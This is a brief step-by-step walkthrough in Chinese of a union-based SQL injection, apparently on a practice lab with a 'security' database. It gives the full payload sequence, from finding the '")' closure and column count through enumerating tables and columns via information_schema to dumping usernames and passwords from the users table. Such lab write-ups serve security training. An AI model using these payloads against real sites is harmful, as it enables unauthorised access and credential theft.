1.判断是否存在注入
?id=1
?id=2 
?id=1" 
报错,闭合点为 ") ,初步猜测为字符型
2.判断注入类型
?id=1" and "1"="1
?id=1" and "1"="2 
注入类型为字符型
3.猜字段
?id=1") order by 3--+
?id=1") order by 4--+
有三个字段
4.确定回显位
?id=-1") union select 1,2,3--+
回显位为2,3
5.查询数据库名,版本号
?id=-1") union select 1,database(),version()--+
6.查询security库的所有表名
?id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema ='security'--+
7.查询users表的所有字段名
?id=-1") union select 1,database(),group_concat(column_name) from information_schema.columns where table_name ='users'--+
8.查询具体信息
?id=-1") union select 1,database(),group_concat(id,'-',username,'-',password) from users--+